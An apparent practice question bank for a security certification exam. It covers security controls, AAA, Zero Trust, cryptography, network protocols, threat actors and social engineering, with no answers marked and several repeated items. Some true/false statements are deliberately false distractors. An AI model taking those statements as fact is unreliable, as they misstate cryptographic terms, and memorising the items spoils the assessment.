• Also known as administrative controls

• Implemented with technology

• Primarily implemented and executed by people (as opposed to computer systems)

Which of the answers listed below refer to examples of technical security controls? (Select 3 answers)

• Security audits

• Encryption

• Organizational security policy

• IDSs

• Configuration management

• Firewalls

Which of the following answers refer to the characteristic features of managerial security controls?
(Select 3 answers)

• Also known as administrative controls

• Sometimes referred to as logical security controls

• Focused on reducing the risk of security incidents

• Executed by computer systems (instead of people)

• Documented in written policies

• Focused on protecting material assets

Examples of managerial security controls include: (Select 3 answers)

• Configuration management

• Data backups

• Organizational security policy

• Risk assessments

• Security awareness training

Which of the answers listed below can be used to describe operational security controls (Select 3
answers)

• Also known as administrative controls

• Focused on the day-to-day procedures of an organization

• Executed by computer systems (instead of people)

• Used to ensure that the equipment continues to work as specified

• Focused on managing risk

• Primarily implemented and executed by people (as opposed to computer systems)

Which of the following examples fall into the category of operational security controls? (Select 3 answers)

• Risk assessments

• Configuration management

• System backups

• Authentication protocols

• Patch management

Which of the answers listed below refers to security controls designed to deter, detect, and prevent
unauthorized access, theft, damage, or destruction of material assets?

• Managerial security controls

• Physical security controls

• Technical security controls

• Operational security controls

Which of the following examples do not fall into the category of physical security controls? (Select 3
answers)

• Lighting

• Access control vestibules

• Data backups

• Fencing/Bollards/Barricades

• Firewalls

• Security guards

• Asset management

What are the examples of preventive security controls? (Select 3 answers)

• Encryption

• IDS

• Sensors

• Firewalls

• Warning signs

• AV software

Examples of deterrent security controls include: (Select 3 answers)

• Warning signs

• Sensors

• Lighting

• Video surveillance

• Security audits

• Fencing/Bollards

Which of the answers listed below refer(s) to detective security control(s)? (Select all that apply)

• Lighting

• Log monitoring

• Sandboxing

• Security audits

• CCTV

• IDS

• Vulnerability scanning

Which of the following answers refer(s) to corrective security control(s)? (Select all that apply)

• Recovering data from backup copies

• Applying software updates and patches to fix vulnerabilities

• Developing and implementing IRPs to respond to and recover from security incidents

• Regularly reviewing logs for anomalies or patterns indicative of attacks

• Activating and executing DRPs to restore operations after a major incident

Which of the answers listed below refer(s) to compensating security control(s)? (Select all that apply)

• Backup power systems

• Video surveillance

• MFA

• Application sandboxing

• Network segmentation

The term "Directive security controls" refers to the category of security controls that are implemented
through policies and procedures.

• True

• False

Which of the following terms fall into the category of directive security controls? (Select 2 answers)

• IRP

• AUP

• IDS

• MFA

• IPS

Which of the terms listed below can be used to describe the basic principles of information security?

• PKI

• AAA

• GDPR

• CIA

The term "Non-repudiation" describes the inability to deny responsibility for performing a specific action. In
the context of data security, non-repudiation ensures data confidentiality, provides
proof of data integrity, and proof of data origin.

• True

• False

Which of the following best applies to the concept of non-repudiation?

• Digital certificate

• MFA

• Hashing

• Encryption

Which type of user account violates the concept of non-repudiation?

• Standard user account

• Shared account

• Guest user account

• Service account

Which part of the AAA security architecture deals with the verification of the identity of a person or process?

• Authentication

• Authorization

• Accounting

In the AAA security architecture, the process of granting or denying access to resources is known as:

• Authentication

• Authorization

• Accounting

In the AAA security architecture, the process of tracking accessed services as well as the amount of
consumed resources is called:

• Authentication

• Authorization

• Accounting

Which of the following solutions provide(s) the AAA functionality? (Select all that apply)

• CHAP

• TACACS+

• PAP

• RADIUS

• MS-CHAP

In the context of the AAA framework, common methods for authenticating people include: (Select 3
answers)

• IP addresses

• Usernames and passwords

• MAC addresses

• Biometrics

• MFA

Which of the answers listed below refer to common methods of device authentication used within the
AAA framework? (Select 3 answers)

• Usernames and passwords

• Digital certificates

• IP addresses

• MFA

• Biometric authentication

• MAC addresses

Which of the following terms describes the process of identifying differences between an organization's
current security posture and its desired security posture?

• Tabletop exercise

• Gap analysis

• Security awareness training

• Risk assessment

The term "Zero Trust security" refers to a cybersecurity model that eliminates implicit trust from networks and
requires all users and devices to be continuously verified before being granted
access to resources. The implementation of the Zero Trust security involves two distinct
components: a Data Plane, responsible for defining and managing security policies, and a Control Plane,
responsible for enforcing the security policies established by the Data Plane.

• True

• False

Which of the answers listed below refers to a Zero Trust Control Plane security approach that takes into
account user identity, device security, network conditions, and other contextual information to
enable dynamic access decisions?

• Implicit trust

• Monitoring and logging

• Adaptive identity

• Microsegmentation

What are the key components of the Zero Trust Control Plane's Policy Decision Point (PDP)? (Select 2
answers)

• Policy Engine (PE)

• Monitoring and logging

• Policy Enforcement Point (PEP)

• Microsegmentation

• Policy Administrator (PA)

In the Zero Trust security architecture, the Policy Enforcement Point (PEP) is a Data Plane
component that enforces the security policies defined at the Control Plane by the Policy Decision Point
(PDP).

• True

• False

An access control vestibule (a.k.a. mantrap) is a physical security access control system used to
prevent unauthorized users from gaining access to restricted areas. An example mantrap could be a
two-door entrance point connected to a guard station wherein a person entering from the
outside remains locked inside until he/she provides the authentication token required to unlock the inner
door.

• True

• False

Which of the following statements about honeypots are true? (Select 2 answers)

• Honeypots are always part of a honeynet

• Honeypots mimic real systems to attract cyber attackers

• Honeypots are a type of anti-malware solution

• Honeypots contain apparent vulnerabilities that are closely monitored by a security team

• Honeypots are used to launch attacks on cyber attackers

What is a honeynet in the context of cybersecurity?

• A network of IDSs

• A network of honeypots

• A network of infected hosts

• A network of IPSs

Which of the answers listed below refers to a honeynet example?

• A network of fake websites

• A network of fake servers

• A network of fake databases

• A network of fake file shares

• All of the above

A honeyfile can be any type of file (e.g., a document, email message, image, or video file) containing real
user data intentionally placed within a network or system to attract potential attackers or unauthorized
users.

• True

• False

A honeyfile can be used for:

• Attracting cyber attackers

• Triggering alerts when accessed

• Monitoring network activity

• All of the above

What is a honeytoken?

• A decoy file that is designed to attract attackers

• A unique identifier assigned to a honeyfile

• A decoy system that is designed to lure potential attackers

• A unique identifier that is designed to track attackers

Which of the following should not be used as honeytokens? (Select all that apply)

• Active user account credentials

• Database entries mimicking real data

• Actual URLs to live websites or resources

• Dummy server logs with enticing information

• Fake identifiers, including usernames, passwords, email addresses, and IP addresses

A process used by organizations to assess and evaluate the potential impact of disruptive
incidents or disasters on their critical business functions and operations is referred to as:

• BPA

• BIA

• SLE

• BCP

A hierarchical system for the creation, management, storage, distribution, and revocation of digital
certificates is known as:

• PKI

• RA

• PKCS

• CA

Which of the answers listed below best describes the characteristics of a public-private key pair?

• Both keys are examples of a symmetrical key

• Two keys that are identical

• A pair of keys where one is used for encryption and the other for decryption

• Both keys are examples of a shared key

What is the typical use of a public key?

• Data encryption

• Data decryption

• User/device authentication

• All of the above

Key escrow is a cryptographic technique that enables storing copies of encryption keys with a trusted
third party. A Recovery Agent (RA) is a trusted third party (an individual, entity, or system)
who is authorized to assist in the retrieval of encryption keys and data on behalf of the data owner. Key
escrow and RA are both used to ensure that encrypted data can be decrypted even if the data owner
loses access to their encryption key. Since key escrow and RAs are both components of a
single security solution, the only way to implement key escrow systems is with the use of RAs.

• True

• False

Which of the answers listed below refers to software technology designed to provide confidentiality for
an entire data storage device?

• TPM

• FDE

• EFS

• HSM

An MS Windows component that enables encryption of individual files is called:

• SED

• EFS

• BitLocker

• FDE

Which of the following software application tools are specifically designed for implementing encryption
algorithms to secure data communication and storage? (Select 2 answers)

• VPN

• GPG

• SSH

• IPsec

• PGP

What is the name of a network protocol that secures web traffic via SSL/TLS encryption?

• SFTP

• HTTPS

• FTPS

• SNMP

Which of the answers listed below refers to a deprecated TLS-based method for secure transmission
of email messages?

• S/MIME

• STARTTLS

• DKIM

• SMTPS

Which of the following answers refers to an obsolete protocol used for secure data transfer over the
web?

• SMTPS

• SRTP

• SHTTP

• S/MIME

Which of the following acronyms refers to software or hardware-based security solutions
designed to detect and prevent unauthorized use and transmission of confidential information?

• IPS

• DLP

• IDS

• DEP

A rule-based access control mechanism implemented on routers, switches, and firewalls is referred
to as:

• ACL

• CSR

• MAC

• AUP

Which type of firmware performs initial hardware checks after the computer is powered on?

• BIOS

• POST

• CMOS

• PROM

Which of the answers listed below refers to a software technology designed to simplify network
infrastructure management?

• SDN

• QoS

• VDI

• CDN

Which of the following is an MS Windows component that enables encryption of individual files?

• EFS

• NTFS

• DFS

• NFS

A system that uses public network (such as the Internet) as a means for creating private encrypted
connections between remote locations is known as:

• WWAN

• VPN

• PAN

• VLAN

Which of the answers listed below refers to a security standard introduced to address the vulnerabilities
found in WEP?

• TKIP

• AES

• WPA

• CCMP

The term "KEK" refers to a type of cryptographic key often used in key management systems to add an
additional layer of security when encrypting and decrypting other cryptographic keys.

• True

• False

POP3 is used for:

• Name resolution

• Sending email messages

• File exchange

• Email retrieval

Which cloud service model would provide the best solution for a web developer intending to create a
web app?

• XaaS

• SaaS

• PaaS

• IaaS

Which of the following answers refers to a cryptographic hash function that has been widely used in the
past but is now considered deprecated for security-sensitive applications due to known
vulnerabilities?

• MD5

• SHA

• CRC

• HMAC

Which of the answers listed below refers to a suite of protocols and technologies providing encryption,
authentication, and data integrity for network traffic?

• TLS

• SSH

• IPsec

• VPN

A network protocol providing an alternative solution to the manual allocation of IP addresses is called:

• DNS

• SNMP

• NAT

• DHCP

Which of the following regulations protects the privacy and personal data of the EU citizens?

• PHI

• HIPAA

• PCI DSS

• GDPR

Which of the answers listed below refers to a mechanical data storage medium type that relies on magnetic
plates and moving parts for data storage and retrieval?

• RAM

• HDD

• NVMe

• SSD

Which of the following terms refers to an environmental control system?

• SCADA

• HIPS

• TEMPEST

• HVAC

A type of network connecting computers within a small geographical area such as a building or group
of buildings is referred to as:

• PAN

• LAN

• MAN

• WAN

Which of the solutions listed below hides the internal IP addresses by modifying IP address information in
IP packet headers while in transit across a traffic routing device?

• QoS

• DHCP

• NAT

• DNS

Which of the following answers refers to a shared secret authentication method used in WPA, WPA2,
and EAP?

• PSK

• 802.1X

• SAE

• TKIP

Copies of lost private encryption keys can be retrieved from a key escrow by RAs (i.e., individuals with
access to key database and permission level allowing them to extract keys from escrow).

• True

• False

Which type of unsolicited messaging relies on text-based communication?

• VAM

• SPIM

• JMS

• SPIT

Which of the answers listed below refers to a secure replacement for Telnet?

• CHAP

• FTP

• SNMP

• SSH

Which of the following answers refers to a family of cryptographic hash functions used in a variety of
security applications, including digital signatures, password storage, secure communications, and
data integrity verification?

• RSA

• IDEA

• AES

• SHA

In the AAA security architecture, the process of granting or denying access to resources is known as:

• Auditing

• Authentication

• Authorization

• Accounting

Which of the terms listed below applies to the authentication process?

• MFA

• MMC

• MDM

• MFD

Which of the following answers refer to NIPS? (Select 3 answers)

• Takes proactive measures to block or mitigate intrusion attempts

• Generates alerts and notifies security personnel or administrators when suspicious
activity is detected

• Operates in an inline mode, actively intercepting and inspecting network traffic

• Monitors network traffic without direct involvement in traffic routing or packet modification

• Does not take direct action to block or prevent attacks

• It can drop or reject network packets, terminate connections, or take other actions to stop the
attack

Which of the terms listed below refers to threat intelligence gathered from publicly available sources?

• IoC

• OSINT

• RFC

• CVE/NVD

Which of the following answers refers to a common PnP interface that allows a PC to communicate
with peripherals and other devices?

• IDE

• PCIe

• USB

• eSATA

Which of the solutions listed below allows checking whether a digital certificate has been revoked?

• OCR

• CRL

• CSR

• OSPF

A type of computer security solution that allows defining and enforcing network access policies is called:

• NAT

• ACL

• NAC

• DLP

Which of the following solutions alleviates the problem of the depleting IPv4 address space by allowing
multiple hosts on the same private LAN to share a single public IP address?

• DNS

• APIPA

• NAT

• DHCP

Which of the answers listed below refers to an individual or role responsible for overseeing and ensuring
compliance with data protection laws and policies within an organization?

• CTO

• DPO

• CIO

• CSO

Which of the following terms refers to an agreement that specifies performance requirements for a
vendor?

• MSA

• SLA

• MOU

• SOW

A legal contract between the holder of confidential information and another person to whom that
information is disclosed restricting that other person from disclosing the confidential information to any
other party is referred to as:

• ISA

• NDA

• BPA

• SLA

Which of the answers listed below refers to a protocol designed to secure data transmitted over WLANs?

• SCP

• IPsec

• SSH

• WTLS

Which of the answers listed below refers to security controls designed to deter, detect, and prevent
unauthorized access, theft, damage, or destruction of material assets?

• Managerial security controls

• Physical security controls

• Technical security controls

• Operational security controls

Which of the following examples do not fall into the category of physical security controls? (Select 3
answers)

• Lighting

• Access control vestibules

• Data backups

• Fencing/Bollards/Barricades

• Firewalls

• Security guards

• Asset management

What are the examples of preventive security controls? (Select 3 answers)

• Encryption

• IDS

• Sensors

• Firewalls

• Warning signs

• AV software

Examples of deterrent security controls include: (Select 3 answers)

• Warning signs

• Sensors

• Lighting

• Video surveillance

• Security audits

• Fencing/Bollards

Which of the answers listed below refer(s) to detective security control(s)? (Select all that apply)

• Lighting

• Log monitoring

• Sandboxing

• Security audits

• CCTV

• IDS

• Vulnerability scanning

Which of the following answers refer(s) to corrective security control(s)? (Select all that apply)

• Recovering data from backup copies

• Applying software updates and patches to fix vulnerabilities

• Developing and implementing IRPs to respond to and recover from security incidents

• Regularly reviewing logs for anomalies or patterns indicative of attacks

• Activating and executing DRPs to restore operations after a major incident

Which of the answers listed below refer(s) to compensating security control(s)? (Select all that apply)

• Backup power systems

• Video surveillance

• MFA

• Application sandboxing

• Network segmentation

The term "Directive security controls" refers to the category of security controls that are implemented
through policies and procedures.

• True

• False

Which of the following terms fall into the category of directive security controls? (Select 2 answers)

• IRP

• AUP

• IDS

• MFA

• IPS

A less formal document outlining mutual goals and cooperation established between two or more
parties is referred to as:

• MOA

• SOW

• MOU

• MSA

Which of the following answers refers to a global standard development organization composed of
different national standards bodies?

• NIST

• ISO

• IEEE

• ANSI

The term "SD-WAN" refers to a network technology that uses software to manage and optimize
network connections that extend over large geographic areas.

• True

• False

Which of the answers listed below refers to a dedicated programming language used in database
management?

• PHP

• C

• SQL

• JS

Which of the following devices fall(s) into the category of PEDs? (Select all that apply)

• Smartphone

• Tablet

• Desktop

• Mainframe

Which of the terms listed below is used to describe the average time required to repair a failed component or
device?

• MTTF

• RPO

• MTTR

• MTBF

Which of the following answers refers to a firewall type that improves upon first- and second-
generation firewalls by offering additional features, such as more in-depth inspection of network traffic
and application-level inspection?

• IDS

• Packet filter

• NGFW

• Stateful firewall

Which protocol enables secure, real-time delivery of audio and video over an IP network?

• S/MIME

• RTP

• SIP

• SRTP

Which of the answers listed below refers to a network security technology designed to monitor, detect, and
mitigate unauthorized access, security threats, and suspicious activities in WLANs?

• WIPS

• NIDS

• NIPS

• WIDS

Which of the following answers refers to a method for creating and verifying digital signatures?

• DHE

• AES

• DSA

• SHA

A type of legally binding contract that establishes the foundational terms and conditions governing
future agreements between two parties is known as:

• MOU

• SLA

• MSA

• SOW

Which part of IPsec provides authentication, integrity, and confidentiality?

• SPD

• PFS

• AH

• ESP

Which of the answers listed below refers to a multi-protocol authentication framework frequently used
in 802.11 networks and point-to-point connections?

• PAP

• MS-CHAP

• EAP

• CHAP

Which of the following acronyms represents evidence that helps cybersecurity professionals detect
potential security incidents?

• APT

• IoC

• ATT&CK

• EDR

For a wireless client to be able to connect to a network, the security type (e.g., WEP, WPA, WPA2, or WPA3)
and encryption type (e.g., TKIP or AES) settings on the connecting host must match the corresponding
wireless security settings on a WAP.

• True

• False

Which of the answers listed below refers to an obsolete authentication protocol that sends passwords
in cleartext?

• PAP

• CHAP

• EAP

• MS-CHAP

Which of the following answers refers to an internal telephone exchange or switching system implemented
in a business or office?

• POTS

• VoIP

• PBX

• PSTN

Which of the acronyms listed below refers to a maximum tolerable period of time required for restoring
business functions after a failure or disaster?

• SLA

• RTO

• AUP

• RPO

A computer network connecting multiple LANs over an area of a city is called:

• PAN

• SAN

• MAN

• CAN

Which cryptographic protocol is designed to provide secure communications over a computer
network and is the successor to SSL?

• WEP

• CCMP

• TLS

• AES

Which of the following answers refers to an embedded microcontroller used for secure boot, disk
encryption, and system integrity verification?

• TPM

• SoC

• UEFI

• HSM

Which of the answers listed below refer to IMAP? (Select 2 answers)

• Offers improved functionality in comparison to POP3

• Serves the same function as POP3

• Enables sending email messages from client devices

• Offers less functions than POP3


• Enables email exchange between mail servers

Which cryptographic solution would be best suited for low-power devices, such as IoT devices, embedded
systems, and mobile devices?

• ECC

• DES

• RSA

• AES

The term "ASLR" refers to a technique used in modern OSs to enhance:

• Data redundancy

• System security

• Performance

• Storage capacity

Which of the following solutions provide the AAA functionality? (Select 2 answers)

• CHAP

• TACACS+

• PAP

• RADIUS

• MS-CHAP

Which of the acronyms listed below refers to a set of rules that specify which users or system
processes are granted access to objects as well as what operations are allowed on a given object?

• CRL

• NAT

• BCP

• ACL

A network admin can ping a remote host by its IP address, but not by its domain name. Which of the following
is the most probable source of this problem?

• ICMP

• DNS

• HTTP

• DHCP

The role of a RA in PKI is to: (Select 2 answers)

• Accept requests for digital certificates


• Validate digital certificates

• Authenticate the entity making the request

• Provide backup source for cryptographic keys

• Issue digital certificates

Which of the answers listed below refers to a generic term used to identify any resource?

• OUI

• URI

• OID

• URL

Which of the following answers refers to a framework widely used for enabling secure third-party access
to user accounts?

• SSO

• OAuth

• MFA

• SAML

An IV is a random or pseudorandom value used in cryptography to ensure that the same plaintext input
does not produce the same ciphertext output, even when the same encryption key is used. The IV is
typically used with encryption algorithms in block cipher modes to enhance security by introducing
randomness to the encryption process.

• True

• False

Which of the answers listed below refers to a security vulnerability that allows an attacker to inject malicious
code into input fields, such as search bars or login forms, to execute unauthorized commands on a
database?

• RCE

• SQLi

• XSS

• CSRF

What is the name of a mobile device deployment model in which employees select devices for
work-related tasks from a company-approved device list?

• VDI

• CYOD

• BYOD

• COPE

Which of the following terms is used to describe sophisticated and prolonged cyberattacks often carried
out by well-funded and organized groups, such as nation-states?

• MitM

• APT

• XSRF

• DDoS

What is STIX?

• Vulnerability database

• Common language for describing cyber threat information

• US government initiative for real-time sharing of cyber threat indicators

• Transport mechanism for cyber threat information

The MIME specification extends the email message format beyond plain text, enabling the transfer of
graphics, audio, and video files over the Internet mail system. S/MIME is an enhanced version of the
MIME protocol that enables email security features by providing encryption, authentication, message
integrity, and other related services.

• True

• False

What is the name of a network protocol that enables secure file transfer over SSH?

• TFTP

• SFTP

• Telnet

• FTPS

SFTP is an extension of the FTP protocol that adds support for SSL/TLS encryption.

• True

• False

A type of cryptographic network protocol for secure data communication, remote command-line
login, remote command execution, and other secure network services between two networked
computers is known as:

• RDP

• SSH

• Telnet

• SCP

Which of the answers listed below refers to a suite of protocols and technologies providing encryption,
authentication, and data integrity for network traffic?

• TLS

• SSH

• IPsec

• VPN

Which part of IPsec provides authentication, integrity, and confidentiality?

• SPD

• PFS

• AH

• ESP

A system that uses a public network (such as the Internet) as a means for creating private encrypted
connections between remote locations is referred to as:

• WWAN

• VPN

• PAN

• VLAN

Which protocol enables secure, real-time delivery of audio and video over an IP network?

• S/MIME

• RTP

• SIP

• SRTP

An encryption protocol primarily used in Wi-Fi networks implementing the WPA2 security standard is
called:

• TKIP

• CCMP

• SSL

• IPsec

A security protocol designed to improve the security of existing WEP implementations is known as:

• WPA2

• RC4

• CCMP

• TKIP

Which of the following answers refer(s) to deprecated/insecure encryption protocols and cryptographic
hash functions? (Select all that apply)

• DES

• AES-256

• MD5

• ECC

• SHA-1

• SSL

• RC4

Which cryptographic protocol is designed to provide secure communications over a computer
network and is the successor to SSL?

• IPsec

• TLS

• AES

• CCMP

Examples of techniques used for encrypting information include symmetric encryption (also
called public-key encryption) and asymmetric encryption (also called secret-key encryption, or
session-key encryption).

• True

• False

In asymmetric encryption, any message encrypted with the use of a public key can only be decrypted
by applying the same algorithm and a matching private key (and vice versa).

• True

• False

Which of the algorithms listed below are not symmetric ciphers? (Select 3 answers)

• AES

• DES

• DHE

• ECC

• IDEA

• RC4

• RSA

Which of the following algorithms do(es) not fall into the category of asymmetric encryption?
(Select all that apply)

• AES

• DES

• DHE

• ECC

• IDEA

• RC4

• RSA

The term "KEK" refers to a type of cryptographic key often used in key management systems to add an
additional layer of security when encrypting and decrypting other cryptographic keys.

• True

• False

Which of the answers listed below refers to a shared secret authentication method used in WPA, WPA2, and
EAP?

• PSK

• 802.1X

• SAE

• TKIP

Which of the following answers refers to a protocol used to set up secure connections and exchange
cryptographic keys in IPsec VPNs?

• SSL

• IKE

• ESP

• DHE

Which of the answers listed below refers to a key exchange protocol that generates temporary keys for
each session, providing forward secrecy to protect past and future communications?

• PFS

• SHA

• PGP

• DHE

Which of the following answers refers to a cryptographic key exchange protocol that leverages ECC
for enhanced security and efficiency?

• IKE

• ECDHE

• DHE

• ECDSA

Which of the answers listed below refers to a solution designed to strengthen the security of session
keys?

• ECB

• PFS

• EFS

• PFX

Which of the following answers refers to a public-key cryptosystem used for digital signatures, secure
key exchange, and encryption?

• ECC

• RSA

• PKI

• DSA

Which cryptographic solution would be best suited for low-power devices, such as IoT devices, embedded
systems, and mobile devices?

• ECC

• DES

• RSA

• AES

Which of the cryptographic algorithms listed below is the least vulnerable to attacks?

• AES

• DES

• RC4

• 3DES

Which of the following answers refers to a legacy symmetric-key block cipher encryption algorithm?

• RC4

• DES

• RSA

• DSA

Which of the answers listed below refers to a deprecated stream cipher used in some legacy applications,
such as WEP?

• RSA

• DES

• SSL

• RC4

Which of the following answers refers to a deprecated (largely replaced by AES) symmetric-key block
cipher encryption algorithm?

• ECDSA

• RSA

• IDEA

• DSA

What is the recommended replacement for DES?

• DSA

• RSA

• RC4

• AES

An IV is a random or pseudorandom value used in cryptography to ensure that the same plaintext input
does not produce the same ciphertext output, even when the same encryption key is used. The IV is
typically used with encryption algorithms in block cipher modes to enhance security by introducing
randomness to the encryption process.

• True

• False

Which of the answers listed below refers to a logical operation commonly used in the context of
cybersecurity, particularly in encryption and obfuscation techniques?

• AND

• OR

• NOT

• XOR

Which of the following answers refers to a block cipher mode that works by chaining the ciphertext
blocks together, such that each ciphertext block depends on the previous block?

• CBC

• GCM

• ECB

• CFB

Which block mode transforms a block cipher into a stream cipher enabling the encryption of individual
bits or bytes of data?

• CFB

• CBC

• GCM

• ECB

A block cipher mode that combines a unique counter with an encryption key to generate a stream of
pseudorandom data blocks, which are then used for encrypting data, is called:

• CBC

• GCM

• CFB

• CTM

Which of the block cipher modes listed below is the simplest/weakest and therefore not
recommended for use?

• CBC

• GCM

• ECB

• CTM

Which block cipher mode combines CTM for encryption with an authentication mechanism to ensure
both data confidentiality and integrity?

• CBC

• GCM

• ECB

• CFB

In cryptography, the number of bits in a key used by a cryptographic algorithm is referred to as key size or
key length. The key length determines the maximum number of combinations required to
break the encryption algorithm, therefore typically a longer key means stronger cryptographic security.

• True

• False

Which AES key length provides the highest level of security?

• 128-bit key

• 192-bit key

• 256-bit key

• 320-bit key

Which of the following answers refers to an embedded microcontroller used for secure boot, disk
encryption, and system integrity verification?

• TPM

• SoC

• UEFI

• HSM

Which of the answers listed below refers to a piece of hardware and associated
software/firmware designed to provide cryptographic and key management functions?

• EFS

• HSM

• SFC

• TPM

Which of the following answers refers to a centralized server that is used to distribute cryptographic
keys and authenticate users and services within a computer network?

• PKI

• RAS

• KDC

• NAS

In a Kerberos-protected network, this type of secure token is granted to users during their initial login
to enable them access to multiple network services without the need to re-enter their login
credentials.

• OTP

• TGT

• AS

• TGS

In cryptography and security, the term "Secure enclave" typically refers to a protected and
isolated hardware or software environment within a computing device, such as a smartphone, tablet,
or computer, where sensitive data and cryptographic operations can be stored and
processed securely.

• True

• False

The term "Obfuscation" is used to describe techniques employed to obscure or hide the true
meaning or nature of data, making it challenging for unauthorized parties to decipher or reverse-
engineer the information.

• True

• False

What is the purpose of steganography?

• Checking data integrity

• Verifying hash values

• Hiding data within another piece of data

• Encrypting data

In the field of data security, the term "Tokenization" refers to the process of replacing sensitive data
with nonsensitive information which holds a reference to the original data and enables its processing
but has no value when breached.

• True

• False

Replacing password characters in a password field with a series of asterisks is an example of:

• Data masking

• Tokenization

• Anonymization

• Pseudo-anonymization

A hash function is a mathematical algorithm that maps data of arbitrary size to a fixed-size hash value,
typically represented as a short string of characters. The hash function result, also known as a digest or
checksum, provides a unique representation of the original data input. The
functionality of hash functions relies on the fact that if there is any change to the data after the original
hash was generated, the new hash value calculated after content modification will be
different from the original result because hash functions are designed to be sensitive to changes in the
input data.

• True

• False

Hash functions find use in a variety of applications, including:

• Cryptography

• Data integrity verification

• Password verification and storage

• Digital signatures

• Blockchain technology

• All of the above

Which of the answers listed below refers to a cryptographic hash function that has been widely used in
the past but is now considered deprecated for security-sensitive applications due to known
vulnerabilities?

• MD5

• SHA

• CRC

• HMAC

Choose an answer from the drop-down list on the right to match a threat actor type on the left with its
common attack vector attribute.

Nation-state

Unskilled attacker

Hacktivist

Insider threat

Organized crime

Shadow IT

Drop-down options:

• Internal

• External

Match each threat actor type with its corresponding resources/funding attribute.

Nation-state

Unskilled attacker

Hacktivist

Insider threat

Organized crime

Shadow IT

Drop-down options:

• Low resources and funding

• Low to medium resources and funding

• Low to high resources and funding

• Medium to high resources and funding

• High resources and funding

Assign the level of sophistication attribute to each threat actor type listed below.

Nation-state

Unskilled attacker

Hacktivist

Insider threat

Organized crime

Shadow IT

Drop-down options:

• Low level of sophistication

• Low to medium level of sophistication

• Low to high level of sophistication

• Medium to high level of sophistication

• High level of sophistication


From the drop-down list on the right, select the typical motivations behind the actions of each threat
actor type.

Nation-state

Unskilled attacker

Hacktivist

Insider threat

Organized crime

Shadow IT

Drop-down options:

• Ethical beliefs, philosophical/political beliefs, disruption/chaos

• Disruption/chaos, financial gain, revenge

• Espionage, political/philosophical beliefs, disruption/chaos, war

• Convenience, lack of awareness of security risks, meeting specific needs

• Financial gain, data exfiltration, extortion

• Revenge, financial gain, service disruption

Which of the following terms is used to describe sophisticated and prolonged cyberattacks often carried
out by well-funded and organized groups, such as nation-states?

• MitM

• APT

• XSRF

• DDoS

In IT security, the term "Shadow IT" is used to describe the practice of using IT systems, software, or
services within an organization without the explicit approval or oversight of the organization's IT
department.

• True

• False

An attack surface is the sum of all the potential points (vulnerabilities) through which an attacker can
interact with or compromise a system or network, indicating the overall exposure to potential threats.
Examples of attack surfaces can be all software, hardware, and network interfaces with known
security flaws. A threat vector represents the method or means through which a cyber threat is
introduced or delivered to a target system. It outlines the pathway or avenue used by attackers to
exploit vulnerabilities. Common threat vector types include phishing emails, malware, drive-by
downloads, and social engineering techniques.

• True

• False

Which of the answers listed below refers to an email-based threat vector?

• Spoofing

• Phishing

• BEC attacks

• Malicious links

• Malware attachments

• All of the above

Which of the following terms refers to a threat vector commonly associated with SMS-based
communication?

• Phishing

• Vishing

• Smishing

• Pharming

Which of the answers listed below refers to an example of a potential threat vector in IM-based
communication?

• Phishing attack

• Malware distribution

• Spoofing attack

• Eavesdropping

• Account hijacking

• Malicious link/attachment

• All of the above


Which of the following answers refer to examples of image-based threat vectors? (Select 3 answers)

• Steganography

• BEC attacks

• Image spoofing (deepfakes)

• Brand impersonation

• Malware-embedded images

Which of the answers listed below refers to a file-based threat vector?

• PDF exploits

• Malicious macros in documents

• Compressed files (ZIP, RAR)

• Malicious scripts in web pages

• Infected images

• Malicious executables

• All of the above

Which of the following answer choices is an example of a threat vector type that is typical for voice
communication?

• Smishing

• Pharming

• Vishing

• Phishing

Examples of threat vectors directly related to the use of removable devices include: (Select 2
answers)

• Pretexting

• Malware delivery

• Watering hole attacks

• Data exfiltration

• Social engineering attacks

Which of the answers listed below refer(s) to client-based software threat vector(s)? (Select all that
apply)

• Drive-by download via web browser

• Malicious macro

• Vulnerability in a network protocol or device

• USB-based attack

• Infected executable file

• Malicious attachment in email application

Which of the following answers refer to agentless software threat vectors? (Select 2 answers)

• Phishing email

• Malicious USB drive

• Network protocol vulnerability

• Infected macro

• Packet sniffing

Exploiting a known vulnerability is a common threat vector for:

• Legacy systems/apps

• Unsupported systems/apps

• Newly released systems/apps

• Systems/apps with zero-day vulnerability

Which of the wireless technologies listed below are considered potential threat vectors and should
be avoided due to their known vulnerabilities? (Select all that apply)

• WPS

• WAP

• WPA

• WAF

• WPA2

• WEP

Which of the following answers refers to a threat vector characteristic only to wired networks?

• ARP Spoofing

• VLAN hopping

• Cable tapping

• Port sniffing

• All of the above


Examples of threat vectors related to Bluetooth communication include: bluesmacking (a type of DoS
attack that targets Bluetooth devices by overwhelming them with excessive traffic),
bluejacking (the practice of sending unsolicited messages or data to a Bluetooth-enabled device),
bluesnarfing (gaining unauthorized access to a Bluetooth device and data theft), and bluebugging
(gaining remote control over a Bluetooth device).

• True

• False

Which of the answers listed below refers to the most probable cause of unauthorized access gained
through the exploitation of a specific network entry point?

• Outdated AV software

• Browser cookies

• Open service ports

• Insufficient logging and monitoring

The importance of changing default usernames and passwords can be illustrated by the example of
certain network devices (such as routers), which are often shipped with default and well-known admin
credentials that can be looked up on the web. Leaving the default credentials unchanged expands the
attack surface by providing an easy entry point for unauthorized access.

• True

• False

Which of the following answers refer to common threat vectors that apply to MSPs, vendors, and suppliers
in the supply chain? (Select 2 answers)

• Compliance violations

• Brand reputation damage

• Propagation of malware

• Operational disruptions

• Social engineering techniques

A social engineering technique whereby attackers, under the disguise of a legitimate request, attempt to
gain access to confidential information is commonly referred to as:

• Phishing

• Smishing

• Pharming

• Spoofing

The practice of using a telephone system to manipulate a user into disclosing confidential information is
known as:

• Whaling

• Spear phishing

• Vishing

• Pharming

Which of the following answers refers to a social engineering attack that exploits SMS or text messages
to deceive recipients into taking harmful actions, such as revealing sensitive information or clicking
malicious links?

• Pharming

• Spoofing

• Quishing

• Smishing

Which of the terms listed below refers to false or misleading information that is spread unintentionally?

• Astroturfing

• Disinformation

• Gaslighting

• Misinformation

Which of the following terms best describes deliberately false or misleading information spread with
the intent to deceive or manipulate?

• Disinformation

• Deception

• Gaslighting

• Manipulation

Which type of social engineering attack relies on identity fraud?

• Pretexting

• Spear phishing

• Tailgating

• Impersonation

A BEC attack is an example of:

• Smishing

• Phishing

• Vishing

• Pharming

Which of the answers listed below refers to a social engineering technique where an attacker creates a
fabricated scenario or situation to deceive the victim into revealing sensitive information?

• Impersonation

• Credential harvesting

• Pretexting

• Watering hole attack

Which of the following terms refers to a common platform for watering hole attacks?

• Mail gateways

• Websites

• PBX systems

• Web browsers

